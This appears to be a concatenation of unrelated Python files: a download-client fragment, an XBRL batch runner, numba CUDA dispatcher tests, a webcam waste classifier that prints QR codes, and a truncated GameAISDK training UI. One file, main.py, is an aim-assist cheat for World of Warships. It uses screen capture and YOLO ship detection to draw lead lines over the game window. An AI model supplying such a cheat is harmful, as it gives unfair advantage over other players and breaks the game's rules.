# this doesn't respect the scope of the archive DID!!!
# and we trust that client_extract==True sources dont have any parameters at the end of the PFN
cea_id = source['pfn'].split('/')
cea_id = cea_id[-1] if len(cea_id[-1]) > 0 else cea_id[-2]
cea_ids.append(cea_id)
sources.append(source)
elif not is_cea:
num_non_cea_sources += 1
sources.append(source)
else:
# no extraction tool
logger.debug('client_extract=True; ignoring source: %s' % source['pfn'])
logger.debug('Prepared sources: num_sources=%d/%d; num_non_cea_sources=%d; num_cea_ids=%d'
% (len(sources), len(file_item['sources']), num_non_cea_sources, len(cea_ids)))
file_item['sources'] = sources
# if there are no cea sources we are done for this item
if min_cea_priority is None:
continue
# decide if file item belongs to the pure or mixed map
# if no non-archive src exists or the highest prio src is an archive src we put it in the pure map
elif num_non_cea_sources == 0 or min_cea_priority == 1:
logger.debug('Adding fiid to cea pure map: '
'num_non_cea_sources=%d; min_cea_priority=%d; num_cea_sources=%d'
% (num_non_cea_sources, min_cea_priority, len(cea_ids)))
for cea_id in cea_ids:
cea_id_pure_to_fiids.setdefault(cea_id, set()).add(fiid)
file_item.setdefault('cea_ids_pure', set()).add(cea_id)
# if there are non-archive sources and archive sources we put it in the mixed map
elif len(cea_ids) > 0:
logger.debug('Adding fiid to cea mixed map: '
'num_non_cea_sources=%d; min_cea_priority=%d; num_cea_sources=%d'
% (num_non_cea_sources, min_cea_priority, len(cea_ids)))
for cea_id in cea_ids:
cea_id_mixed_to_fiids.setdefault(cea_id, set()).add(fiid)
file_item.setdefault('cea_ids_mixed', set()).add(cea_id)
# put all archives from the mixed list into the pure list if they meet
# certain conditions, e.g., an archive that is already in the pure list
for cea_id_mixed in list(cea_id_mixed_to_fiids.keys()):
fiids_mixed = cea_id_mixed_to_fiids[cea_id_mixed]
if cea_id_mixed in cea_id_pure_to_fiids:
# file from mixed list is already in a pure list
logger.debug('Mixed ID is already in cea pure map: '
'cea_id_mixed=%s; num_fiids_mixed=%d; num_cea_pure_fiids=%d'
% (cea_id_mixed, len(fiids_mixed), len(cea_id_pure_to_fiids[cea_id_mixed])))
elif len(fiids_mixed) >= self.use_cea_threshold:
# more than use_cea_threshold files are in a common archive
logger.debug('Number of needed files in cea reached threshold: '
'cea_id_mixed=%s; num_fiids_mixed=%d; threshold=%d'
% (cea_id_mixed, len(fiids_mixed), self.use_cea_threshold))
else:
# dont move from mixed list to pure list
continue
# first add cea_id to pure map so it can be removed from mixed map later
cea_id_pure_to_fiids.setdefault(cea_id_mixed, set()).update(fiids_mixed)
# now update all file_item mixed/pure maps
for fiid_mixed in list(fiids_mixed):
file_item = fiid_to_file_item[fiid_mixed]
# add cea id to file_item pure map
file_item.setdefault('cea_ids_pure', set()).add(cea_id_mixed)
# remove file item mixed map and
# remove references from all other mixed archives to file_item
for cea_id_mixed2 in file_item.pop('cea_ids_mixed'):
cea_id_mixed_to_fiids[cea_id_mixed2].remove(fiid_mixed)
# finally remove cea_id from mixed map
cea_id_mixed_to_fiids.pop(cea_id_mixed)
for file_item in all_file_items:
cea_ids_pure = file_item.get('cea_ids_pure', set())
cea_ids_mixed = file_item.get('cea_ids_mixed', set())
if len(cea_ids_pure) > 0:
logger.debug('Removing all non-cea sources of file %s' % file_item['did'])
file_item['sources'] = [s for s in file_item['sources'] if s.get('client_extract', False)]
elif len(cea_ids_mixed) > 0:
logger.debug('Removing all cea sources of file %s' % file_item['did'])
file_item['sources'] = [s for s in file_item['sources'] if not s.get('client_extract', False)]
# reduce the amount of archives to download by removing
# all redundant pure archives (=all files can be extracted from other archives)
for cea_id_pure in list(cea_id_pure_to_fiids.keys()):
# if all files of this archive are available in more than one archive the archive is redundant
if all(len(fiid_to_file_item[fiid_pure]['cea_ids_pure']) > 1 for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]):
for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]:
fiid_to_file_item[fiid_pure]['cea_ids_pure'].discard(cea_id_pure)
logger.debug('Removing redundant archive %s' % cea_id_pure)
cea_id_pure_to_fiids.pop(cea_id_pure)
# remove all archives of a file except a single one so
# that each file is assigned to exactly one pure archive
for cea_id_pure in cea_id_pure_to_fiids:
for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]:
cea_ids_pure = fiid_to_file_item[fiid_pure]['cea_ids_pure']
for cea_id_pure_other in list(cea_ids_pure):
if cea_id_pure != cea_id_pure_other:
cea_id_pure_to_fiids[cea_id_pure_other].discard(fiid_pure)
cea_ids_pure.discard(cea_id_pure_other)
download_packs = []
cea_id_to_pack = {}
for file_item in all_file_items:
cea_ids = file_item.get('cea_ids_pure', set())
if len(cea_ids) > 0:
cea_id = next(iter(cea_ids))
pack = cea_id_to_pack.get(cea_id)
if pack is None:
scope = file_item['scope']
first_dest = next(iter(file_item['merged_options']['destinations']))
dest_path = os.path.join(self._prepare_dest_dir(first_dest[0], scope, cea_id, first_dest[1]), cea_id)
pack = {'scope': scope,
'name': cea_id,
'dest_file_paths': [dest_path],
'temp_file_path': '%s.part' % dest_path,
'sources': file_item['sources'],
'merged_options': {'ignore_checksum': True}, # we currently dont have checksums for the archive
'archive_items': []
}
cea_id_to_pack[cea_id] = pack
download_packs.append(pack)
file_item.pop('sources')
pack['archive_items'].append(file_item)
else:
download_packs.append(file_item)
return download_packs
def _split_did_str(self, did_str):
"""
Splits a given DID string (e.g. 'scope1:name.file') into its scope and name part
(This function is meant to be used as class internal only)
:param did_str: the DID string that will be splitted
:returns: the scope- and name part of the given DID
:raises InputValidationError: if the given DID string is not valid
"""
did = did_str.split(':')
if len(did) == 2:
did_scope = did[0]
did_name = did[1]
elif len(did) == 1:
did = did_str.split('.')
did_scope = did[0]
if did_scope == 'user' or did_scope == 'group':
did_scope = '%s.%s' % (did[0], did[1])
did_name = did_str
else:
raise InputValidationError('%s is not a valid DID. To many colons.' % did_str)
if did_name.endswith('/'):
did_name = did_name[:-1]
return did_scope, did_name
def _prepare_dest_dir(self, base_dir, dest_dir_name, file_name, no_subdir):
"""
Builds the final destination path for a file and:
1. deletes existing files if no_subdir was given
2. creates the destination directory if it's not existent
(This function is meant to be used as class internal only)
:param base_dir: base directory part
:param dest_dir_name: name of the destination directory
:param file_name: name of the file that will be downloaded
:param no_subdir: if no subdirectory should be created
:returns: the absolut path of the destination directory
"""
dest_dir_path = os.path.abspath(base_dir)
# if no subdirectory is used, existing files will be overwritten
if no_subdir:
dest_file_path = os.path.join(dest_dir_path, file_name)
if os.path.isfile(dest_file_path):
self.logger.debug('Deleting existing file: %s' % dest_file_path)
os.remove(dest_file_path)
else:
dest_dir_path = os.path.join(dest_dir_path, dest_dir_name)
if not os.path.isdir(dest_dir_path):
os.makedirs(dest_dir_path)
return dest_dir_path
def _check_output(self, output_items):
"""
Checks if all files were successfully downloaded
(This function is meant to be used as class internal only)
:param output_items: list of dictionaries describing the downloaded files
:returns: output_items list
:raises NoFilesDownloaded:
:raises NotAllFilesDownloaded:
"""
success_states = ['ALREADY_DONE', 'DONE', 'FOUND_IN_PCACHE']
# failure_states = ['FILE_NOT_FOUND', 'FAIL_VALIDATE', 'FAILED']
num_successful = 0
num_failed = 0
for item in output_items:
clientState = item.get('clientState', 'FAILED')
if clientState in success_states:
num_successful += 1
else:
num_failed += 1
if num_successful == 0:
raise NoFilesDownloaded()
elif num_failed > 0:
raise NotAllFilesDownloaded()
return output_items
def _send_trace(self, trace):
"""
Checks if sending trace is allowed and send the trace.
:param trace: the trace
"""
if self.tracing:
send_trace(trace, self.client.host, self.client.user_agent)
|
xbrl_run.py
|
# -*- coding: utf-8 -*-
import os
import time
from pathlib import Path
import multiprocessing
import json
import codecs
import pickle
from multiprocessing import Process, Array
from xbrl_reader import Inf, SchemaElement, Calc, init_xbrl_reader, read_company_dic, readXbrlThread, make_public_docs_list
start_time = time.time()
def f(cpu_count, cpu_id, public_docs_list, progress, company_dic):
readXbrlThread(cpu_count, cpu_id, public_docs_list, progress, company_dic)
if __name__ == '__main__':
init_xbrl_reader()
company_dic = read_company_dic()
cpu_count = multiprocessing.cpu_count()
progress = Array('i', [0] * cpu_count)
public_docs_list = make_public_docs_list(cpu_count, company_dic)
process_list = []
for cpu_id in range(cpu_count):
p = Process(target=readXbrlThread, args=(cpu_count, cpu_id, public_docs_list[cpu_id], progress, company_dic))
process_list.append(p)
p.start()
for p in process_list:
p.join()
print('終了:%d' % int(time.time() - start_time) )
|
main.py
|
import win32api
import win32gui
import win32ui
import win32con
from PIL import ImageGrab
import PIL
import matplotlib.pyplot as plt
import numpy as np
import time
import torch
import torch.backends.cudnn as cudnn
from digitTrain import MyModel
from digitTrain import MyDataSet
import sys
from multiprocessing import Process, Queue
sys.path.append('yolov5-master')
from models.common import DetectMultiBackend
from utils.datasets import IMG_FORMATS, VID_FORMATS, LoadImages, LoadStreams
from utils.general import (LOGGER, check_file, check_img_size, check_imshow, check_requirements, colorstr,
increment_path, non_max_suppression, print_args, scale_coords, strip_optimizer, xyxy2xywh)
from utils.plots import Annotator, colors, save_one_box
from utils.torch_utils import select_device, time_sync
from multiprocessing import Process, Queue
def DetectProcess(q):
print("proc start")
width = 7
height = 11
yLoc = 557
xLocs = (877,884,895,902)
digitModel = MyModel.load_from_checkpoint("digit.ckpt")
digitModel.cuda()
digitModel.eval()
device = select_device('0')
model = DetectMultiBackend('best.pt', device=device, dnn=False, data='')
stride, names, pt, jit, onnx, engine = model.stride, model.names, model.pt, model.jit, model.onnx, model.engine
imgsz = check_img_size((640,640), s=stride)
model.model.float()
model.warmup(imgsz=(1, 3, *imgsz), half=False)
while True:
item = {}
item["rects"] = []
item["leads"] = []
img_ready = ImageGrab.grab((0, 0, 1920, 1080))
img_arr = np.array(img_ready)
digits = np.zeros((0,height,width,3))
for x in xLocs:
digit = img_arr[yLoc:yLoc+height, x:x+width, :].reshape(1,height,width,3)
digits = np.concatenate((digits,digit),axis = 0)
torch_digits = torch.Tensor((digits/255-0.5)*2)
digit_result = torch.argmax(digitModel.model(torch_digits.cuda()),dim = 1)
num_result = np.array(digit_result.cpu())
txt = ""
for i in range(len(num_result)):
num = num_result[i]
if num == 10:
num = 0
txt += str(num)
if(i==1):
txt += "."
y = yLoc+height+2
x = xLocs[0]
seconds = float(txt)
lead = seconds/3.6
item["textArgs"] = txt,5,(x,y,x+width*5,y+height),win32con.DT_TOP
y = y+height+2
item["leadArgs"] = str(lead),3,(x+width,y,x+width*4,y+height),win32con.DT_TOP
screen_arr = np.array(img_ready.resize((640,640),PIL.Image.BICUBIC)).transpose((2,0,1))
screen_arr = np.ascontiguousarray(screen_arr)/255.0
screen_arr = screen_arr[None]
pred = model(torch.from_numpy(screen_arr).cuda().float(), augment=False, visualize=False)
pred = non_max_suppression(pred, 0.25, 0.45, None, False, max_det=50)
for i, det in enumerate(pred): # per image
if len(det):
# Rescale boxes from img_size to im0 size
#det[:, :4] = scale_coords((640,640), det[:, :4], (1080,1920)).round()
# Print results
for c in det[:, -1].unique():
n = (det[:, -1] == c).sum() # detections per class
# Write results
for *xyxy, conf, cls in reversed(det):
xyxy[0] = (xyxy[0]/640*1920).round()
xyxy[1] = (xyxy[1]/640*1080).round()
xyxy[2] = (xyxy[2]/640*1920).round()
xyxy[3] = (xyxy[3]/640*1080).round()
item["rects"] += [[int(xyxy[0]),int(xyxy[1]),int(xyxy[2]),int(xyxy[3])]]
length = float(xyxy[2]-xyxy[0])*lead
h = (xyxy[3]-xyxy[1])*2
if cls < 0.5:
realLead = (xyxy[2]+length).round()
item["leads"] += [[int(realLead),int(h),int(xyxy[2]),int(xyxy[3])]]
else:
realLead = (xyxy[0]-length).round()
item["leads"] += [[int(realLead),int(h),int(xyxy[2]),int(xyxy[3])]]
if(q.empty()):
q.put(item)
def myDrawRectangle(hdc, x1, y1, x2, y2):
win32gui.Polyline(hdc, ((x1,y1),(x1,y2),(x2,y2),(x2,y1),(x1,y1)))
def myDrawLead(hdc,realLead,height,x,y):
win32gui.Polyline(hdc, ((x,y),(realLead,y)))
win32gui.Polyline(hdc, ((realLead,y),(realLead,y+height)))
if __name__ == "__main__":
hwnd = win32gui.FindWindow(None, "《戰艦世界》")
hdc = win32gui.GetDC(hwnd)
#hdc = win32gui.GetDC(0)
hpen = win32gui.CreatePen(win32con.PS_GEOMETRIC,2, win32api.RGB(255,0,0))
win32gui.SelectObject(hdc,hpen)
win32gui.SetTextColor(hdc, win32api.RGB(255,255,255))
win32gui.SetBkColor(hdc,win32api.RGB(0,0,0))
font = win32ui.CreateFont({'height':11,'width':7})
win32gui.SelectObject(hdc,font.GetSafeHandle())
q = Queue()
item = None
procDectect = Process(target=DetectProcess,args=(q,))
procDectect.start()
while True:
if not q.empty():
item = q.get(True)
if item:
win32gui.DrawText(hdc, *item["textArgs"])
win32gui.DrawText(hdc, *item["leadArgs"])
for i in range(len(item["rects"])):
myDrawRectangle(hdc,*(item["rects"][i]))
myDrawLead(hdc,*(item["leads"][i]))
|
test_dispatcher.py
|
import numpy as np
import threading
from numba import cuda, float32, float64, int32, int64, void
from numba.core.errors import NumbaDeprecationWarning
from numba.cuda.testing import skip_on_cudasim, unittest, CUDATestCase
import math
def add(x, y):
return x + y
def add_kernel(r, x, y):
r[0] = x + y
@skip_on_cudasim('Dispatcher objects not used in the simulator')
class TestDispatcher(CUDATestCase):
def _test_no_double_specialize(self, dispatcher, ty):
with self.assertRaises(RuntimeError) as e:
dispatcher.specialize(ty)
self.assertIn('Dispatcher already specialized', str(e.exception))
def test_no_double_specialize_sig_same_types(self):
# Attempting to specialize a kernel jitted with a signature is illegal,
# even for the same types the kernel is already specialized for.
@cuda.jit('void(float32[::1])')
def f(x):
pass
self._test_no_double_specialize(f, float32[::1])
def test_no_double_specialize_no_sig_same_types(self):
# Attempting to specialize an already-specialized kernel is illegal,
# even for the same types the kernel is already specialized for.
@cuda.jit
def f(x):
pass
f_specialized = f.specialize(float32[::1])
self._test_no_double_specialize(f_specialized, float32[::1])
def test_no_double_specialize_sig_diff_types(self):
# Attempting to specialize a kernel jitted with a signature is illegal.
@cuda.jit('void(int32[::1])')
def f(x):
pass
self._test_no_double_specialize(f, float32[::1])
def test_no_double_specialize_no_sig_diff_types(self):
# Attempting to specialize an already-specialized kernel is illegal.
@cuda.jit
def f(x):
pass
f_specialized = f.specialize(int32[::1])
self._test_no_double_specialize(f_specialized, float32[::1])
def test_specialize_cache_same(self):
# Ensure that the same dispatcher is returned for the same argument
# types, and that different dispatchers are returned for different
# argument types.
@cuda.jit
def f(x):
pass
self.assertEqual(len(f.specializations), 0)
f_float32 = f.specialize(float32[::1])
self.assertEqual(len(f.specializations), 1)
f_float32_2 = f.specialize(float32[::1])
self.assertEqual(len(f.specializations), 1)
self.assertIs(f_float32, f_float32_2)
f_int32 = f.specialize(int32[::1])
self.assertEqual(len(f.specializations), 2)
self.assertIsNot(f_int32, f_float32)
def test_specialize_cache_same_with_ordering(self):
# Ensure that the same dispatcher is returned for the same argument
# types, and that different dispatchers are returned for different
# argument types, taking into account array ordering and multiple
# arguments.
@cuda.jit
def f(x, y):
pass
self.assertEqual(len(f.specializations), 0)
# 'A' order specialization
f_f32a_f32a = f.specialize(float32[:], float32[:])
self.assertEqual(len(f.specializations), 1)
# 'C' order specialization
f_f32c_f32c = f.specialize(float32[::1], float32[::1])
self.assertEqual(len(f.specializations), 2)
self.assertIsNot(f_f32a_f32a, f_f32c_f32c)
# Reuse 'C' order specialization
f_f32c_f32c_2 = f.specialize(float32[::1], float32[::1])
self.assertEqual(len(f.specializations), 2)
self.assertIs(f_f32c_f32c, f_f32c_f32c_2)
# The following tests are based on those in numba.tests.test_dispatcher
def test_coerce_input_types(self):
# Do not allow unsafe conversions if we can still compile other
# specializations.
c_add = cuda.jit(add_kernel)
# Using a complex128 allows us to represent any result produced by the
# test
r = np.zeros(1, dtype=np.complex128)
c_add[1, 1](r, 123, 456)
self.assertEqual(r[0], add(123, 456))
c_add[1, 1](r, 12.3, 45.6)
self.assertEqual(r[0], add(12.3, 45.6))
c_add[1, 1](r, 12.3, 45.6j)
self.assertEqual(r[0], add(12.3, 45.6j))
c_add[1, 1](r, 12300000000, 456)
self.assertEqual(r[0], add(12300000000, 456))
# Now force compilation of only a single specialization
c_add = cuda.jit('(i4[::1], i4, i4)')(add_kernel)
r = np.zeros(1, dtype=np.int32)
c_add[1, 1](r, 123, 456)
self.assertPreciseEqual(r[0], add(123, 456))
@unittest.expectedFailure
def test_coerce_input_types_unsafe(self):
# Implicit (unsafe) conversion of float to int, originally from
# test_coerce_input_types. This test presently fails with the CUDA
# Dispatcher because argument preparation is done by
# _Kernel._prepare_args, which is currently inflexible with respect to
# the types it can accept when preparing.
#
# This test is marked as xfail until future changes enable this
# behavior.
c_add = cuda.jit('(i4[::1], i4, i4)')(add_kernel)
r = np.zeros(1, dtype=np.int32)
c_add[1, 1](r, 12.3, 45.6)
self.assertPreciseEqual(r[0], add(12, 45))
def test_coerce_input_types_unsafe_complex(self):
# Implicit conversion of complex to int disallowed
c_add = cuda.jit('(i4[::1], i4, i4)')(add_kernel)
r = np.zeros(1, dtype=np.int32)
with self.assertRaises(TypeError):
c_add[1, 1](r, 12.3, 45.6j)
def test_ambiguous_new_version(self):
"""Test compiling new version in an ambiguous case
"""
c_add = cuda.jit(add_kernel)
r = np.zeros(1, dtype=np.float64)
INT = 1
FLT = 1.5
c_add[1, 1](r, INT, FLT)
self.assertAlmostEqual(r[0], INT + FLT)
self.assertEqual(len(c_add.overloads), 1)
c_add[1, 1](r, FLT, INT)
self.assertAlmostEqual(r[0], FLT + INT)
self.assertEqual(len(c_add.overloads), 2)
c_add[1, 1](r, FLT, FLT)
self.assertAlmostEqual(r[0], FLT + FLT)
self.assertEqual(len(c_add.overloads), 3)
# The following call is ambiguous because (int, int) can resolve
# to (float, int) or (int, float) with equal weight.
c_add[1, 1](r, 1, 1)
self.assertAlmostEqual(r[0], INT + INT)
self.assertEqual(len(c_add.overloads), 4, "didn't compile a new "
"version")
def test_lock(self):
"""
Test that (lazy) compiling from several threads at once doesn't
produce errors (see issue #908).
"""
errors = []
@cuda.jit
def foo(r, x):
r[0] = x + 1
def wrapper():
try:
r = np.zeros(1, dtype=np.int64)
foo[1, 1](r, 1)
self.assertEqual(r[0], 2)
except Exception as e:
errors.append(e)
threads = [threading.Thread(target=wrapper) for i in range(16)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertFalse(errors)
def test_get_regs_per_thread_unspecialized(self):
# A kernel where the register usage per thread is likely to differ
# between different specializations
@cuda.jit
def pi_sin_array(x, n):
i = cuda.grid(1)
if i < n:
x[i] = 3.14 * math.sin(x[i])
# Call the kernel with different arguments to create two different
# definitions within the Dispatcher object
N = 10
arr_f32 = np.zeros(N, dtype=np.float32)
arr_f64 = np.zeros(N, dtype=np.float64)
pi_sin_array[1, N](arr_f32, N)
pi_sin_array[1, N](arr_f64, N)
# Check we get a positive integer for the two different variations
sig_f32 = void(float32[::1], int64)
sig_f64 = void(float64[::1], int64)
regs_per_thread_f32 = pi_sin_array.get_regs_per_thread(sig_f32)
regs_per_thread_f64 = pi_sin_array.get_regs_per_thread(sig_f64)
self.assertIsInstance(regs_per_thread_f32, int)
self.assertIsInstance(regs_per_thread_f64, int)
self.assertGreater(regs_per_thread_f32, 0)
self.assertGreater(regs_per_thread_f64, 0)
# Check that getting the registers per thread for all signatures
# provides the same values as getting the registers per thread for
# individual signatures.
regs_per_thread_all = pi_sin_array.get_regs_per_thread()
self.assertEqual(regs_per_thread_all[sig_f32.args],
regs_per_thread_f32)
self.assertEqual(regs_per_thread_all[sig_f64.args],
regs_per_thread_f64)
if regs_per_thread_f32 == regs_per_thread_f64:
# If the register usage is the same for both variants, there may be
# a bug, but this may also be an artifact of the compiler / driver
# / device combination, so produce an informational message only.
print('f32 and f64 variant thread usages are equal.')
print('This may warrant some investigation. Devices:')
cuda.detect()
def test_get_regs_per_thread_specialized(self):
@cuda.jit(void(float32[::1], int64))
def pi_sin_array(x, n):
i = cuda.grid(1)
if i < n:
x[i] = 3.14 * math.sin(x[i])
# Check we get a positive integer for the specialized variation
regs_per_thread = pi_sin_array.get_regs_per_thread()
self.assertIsInstance(regs_per_thread, int)
self.assertGreater(regs_per_thread, 0)
def test_deprecated_definitions(self):
@cuda.jit(void(int64[::1]))
def foo(x):
x[0] = 0
with self.assertWarns(NumbaDeprecationWarning) as warns:
foo.definition
self.assertEqual(len(warns.warnings), 1)
s = str(warns.warnings[0])
self.assertIn('Use overloads instead of definition', s)
self.assertNotIn('definitions', s)
with self.assertWarns(NumbaDeprecationWarning) as warns:
foo.definitions
self.assertEqual(len(warns.warnings), 1)
s = str(warns.warnings[0])
self.assertIn('Use overloads instead of definitions', s)
if __name__ == '__main__':
unittest.main()
|
face_detection.py
|
# MIT License
#
# Copyright (c) 2019 Jian James Astrero
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
import argparse
import threading
import time
import numpy as np
import tensorflow as tf
import qrcode as qr
from PIL import Image
def main():
# database = prepare_database()
webcam_face_recognizer()
return
model_file = "../tf_files/retrained_graph.pb"
label_file = "../tf_files/retrained_labels.txt"
input_height = 299
input_width = 299
input_mean = 0
input_std = 255
input_layer = "Placeholder"
output_layer = "final_result"
is_processing = False
def webcam_face_recognizer():
"""
Runs a loop that extracts images from the computer's webcam and determines whether or not
it contains the face of a person in our database.
If it contains a face, an audio message will be played welcoming the user.
If not, the program will process the next frame from the webcam
"""
cv2.namedWindow("WebCam Video Feed")
vc = cv2.VideoCapture(0)
face_cascade = cv2.CascadeClassifier('../haarcascade_frontalface_default.xml')
while vc.isOpened():
_, frame = vc.read()
img = frame
# We do not want to detect a new identity while the program is in the process of identifying another person
# if ready_to_detect_identity:
# img = process_frame(img, frame, face_cascade, database)
process_image_thread = threading.Thread(target=process_image, args=(img,))
process_image_thread.start()
key = cv2.waitKey(100)
cv2.imshow("preview", img)
if key == 27: # exit on ESC
break
cv2.destroyWindow("WebCam Video Feed")
def load_graph(model_file):
graph = tf.Graph()
graph_def = tf.GraphDef()
with open(model_file, "rb") as f:
graph_def.ParseFromString(f.read())
with graph.as_default():
tf.import_graph_def(graph_def)
return graph
def read_tensor_from_image(image,
input_height=299,
input_width=299,
input_mean=0,
input_std=255):
input_name = "file_reader"
output_name = "normalized"
image_reader = image
float_caster = tf.cast(image_reader, tf.float32)
dims_expander = tf.expand_dims(float_caster, 0)
resized = tf.image.resize_bilinear(dims_expander, [input_height, input_width])
normalized = tf.divide(tf.subtract(resized, [input_mean]), [input_std])
sess = tf.Session()
result = sess.run(normalized)
return result
def load_labels(label_file):
label = []
proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()
for l in proto_as_ascii_lines:
label.append(l.rstrip())
return label
def process_image(img):
global is_processing
if not is_processing:
is_processing = True
graph = load_graph(model_file)
input_name = "import/" + input_layer
output_name = "import/" + output_layer
input_operation = graph.get_operation_by_name(input_name)
output_operation = graph.get_operation_by_name(output_name)
t = read_tensor_from_image(
img,
input_height=input_height,
input_width=input_width,
input_mean=input_mean,
input_std=input_std)
with tf.Session(graph=graph) as sess:
results = sess.run(output_operation.outputs[0], {
input_operation.outputs[0]: t
})
results = np.squeeze(results)
top_k = results.argsort()[-5:][::-1]
labels = load_labels(label_file)
identity = ""
for i in top_k:
if identity == "":
identity = labels[i]
print(labels[i], results[i])
print("-------------identified as: " + identity)
amount = "0"
if identity == "trash":
amount = "1"
elif identity == "paper":
amount = "5"
elif identity == "plastic":
amount = "10"
elif identity == "metal":
amount = "15"
img = qr.make(amount)
print(type(img))
print(img.size)
img.save("../qr.png")
image = Image.open("../qr.png")
image.show()
time.sleep(10)
is_processing = False
main()
|
train_node.py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making GameAISDK available.
This source code file is licensed under the GNU General Public License Version 3.
For full details, please refer to the file "LICENSE.txt" which is provided as part of this source code package.
Copyright (C) 2020 THL A29 Limited, a Tencent company. All rights reserved.
"""
import re
import logging
import time
import traceback
import os
from collections import OrderedDict
import urllib.request
import threading
import platform
import matplotlib.pyplot as plot
import numpy
from PyQt5.QtCore import QObject, Qt, pyqtSignal
from PyQt5.QtWidgets import QComboBox, QTreeWidgetItem
from ...canvas.data_source import DataSource
from ...main_window.tool_window import ui
from ....common.define import TRAIN_NAME, CONFIG_RECORD, START_RECORD, STOP_RECORD, START_TRAIN, STOP_TRAIN, \
BOOL_FLAGS, ACTION_SAMPLE_PATH, RECORD_ANDROID_GUIDANCE_IMG, RECORD_WINDOWS_GUIDANCE_IMG, SDK_PATH, BIN_PATH
from ...canvas.canvas_signal import canvas_signal_inst
from ...dialog.label_dialog import LabelDialog
from ...dialog.tip_dialog import show_warning_tips
from ...utils import set_log_text, get_sub_nodes, create_tree_item, ExecResult, get_tree_top_nodes, save_action, \
valid_number_value, filter_info_log, is_image
from .train_data import TrainData
from ....context.app_context import AppContext
from ....project.project_manager import g_project_manager
from ....subprocess_service.subprocess_service_manager import backend_service_manager as bsa
from ....common.utils import backend_service_monitor
from ....WrappedDeviceAPI.wrappedDeviceConfig import DeviceType
IS_WINDOWS_SYSTEM = platform.platform().lower().startswith('win')
if IS_WINDOWS_SYSTEM:
from ....WrappedDeviceAPI.deviceAPI.pcDevice.windows.win32driver import probe, by
logger = logging.getLogger("sdktool")
class TrainNode(QObject):
ACTION_SAMPLE_SERVICE_NAME = 'train_node_action_sample'
AISDK_TRAIN_SERVICE_NAME = 'train_node_train'
clear_right_tree_signal = pyqtSignal(ExecResult)
log_signal = pyqtSignal(str)
run_signal = pyqtSignal(str, str, bool)
def __init__(self):
super().__init__()
# self.__record_process = None
self.__train_process = None
self.__node = None
self.__data = TrainData()
self.__left_tree = ui.tree_widget_left
self.__right_tree = ui.tree_widget_right
self.__over = False
self._http_server_port = 52808
self._is_training = False
def create_node(self, run_node):
if run_node is None:
logger.error("run node is none, create train node failed")
return
result = ExecResult()
self.clear_right_tree_signal.emit(result)
self.__right_tree.clear()
sub_nodes = get_sub_nodes(run_node)
for sub_node in sub_nodes:
if sub_node.text(0) == TRAIN_NAME:
self.__node = sub_node
break
if self.__node is None:
self.__node = create_tree_item(key=TRAIN_NAME, edit=False)
run_node.addChild(self.__node)
run_node.setExpanded(True)
else:
for _ in range(self.__node.childCount()):
self.__node.takeChild(0)
sub_names = [CONFIG_RECORD, START_RECORD, STOP_RECORD, START_TRAIN, STOP_TRAIN]
for sub_name in sub_names:
self.__node.addChild(create_tree_item(key=sub_name, node_type=sub_name, edit=False))
self.__node.setExpanded(True)
def config_record(self):
# 保存右树
result = ExecResult()
self.clear_right_tree_signal.emit(result)
self.__right_tree.clear()
param = self.__data.load_record_data()
for key, value in param.items():
self.create_complex_node(key=key, value=value)
def _combobox_text_changed(self, text):
current_item = self.__right_tree.currentItem()
current_item.setText(1, text)
def create_complex_node(self, key, value, root=None, edit_flag=True):
# 0: key, 1:value, 2:type
if root is None:
sub_node = QTreeWidgetItem(self.__right_tree)
sub_node.setText(0, key)
else:
sub_node = create_tree_item(key=key, edit=edit_flag)
root.addChild(sub_node)
root.setExpanded(True)
logger.debug("value %s type %s", value, type(value))
if isinstance(value, bool):
combobox = QComboBox()
combobox.addItems(BOOL_FLAGS)
# combobox.setCurrentIndex(-1)
combobox.setCurrentText(str(value))
combobox.currentTextChanged.connect(self._combobox_text_changed)
sub_node.setText(1, str(value))
self.__right_tree.setItemWidget(sub_node, 1, combobox)
elif isinstance(value, (int, float, str)):
logger.debug("key %s value %s type str", key, value)
sub_node.setText(1, str(value))
sub_node.setFlags(sub_node.flags() | Qt.ItemIsEditable)
elif isinstance(value, (dict, OrderedDict)):
logger.debug("value %s type dict", value)
for sub_key, sub_value in value.items():
self.create_complex_node(key=sub_key, value=sub_value, root=sub_node, edit_flag=edit_flag)
sub_node.setExpanded(True)
@staticmethod
def _stop_canvas_phone():
data_source = DataSource()
data_source.finish()
def show_train_info(self):
result = ExecResult()
self.clear_right_tree_signal.emit(result)
self.__right_tree.clear()
network_param = self.__data.get_network_parameter()
if network_param is None:
logger.error("train info is none")
return
# 展示,不可编辑
for key, value in network_param.items():
item = QTreeWidgetItem(self.__right_tree)
item.setText(0, key)
item.setText(1, str(value))
def show_record_info(self):
param = self.__data.load_record_data()
if param is None:
return
# 展示,不可编辑
for key, value in param.items():
item = QTreeWidgetItem(self.__right_tree)
item.setText(0, key)
item.setText(1, str(value))
def is_training(self):
return bsa.exist_service(service_name=self.AISDK_TRAIN_SERVICE_NAME)
def is_recording(self):
return bsa.exist_process(self.ACTION_SAMPLE_SERVICE_NAME)
def _notify_record_process_stop(self):
""" 通知录制进程退出
:return:
"""
def notify_record_process_stop():
cmd = 'http://127.0.0.1:%s?method=quit' % self._http_server_port
logger.info('http get request: %s', cmd)
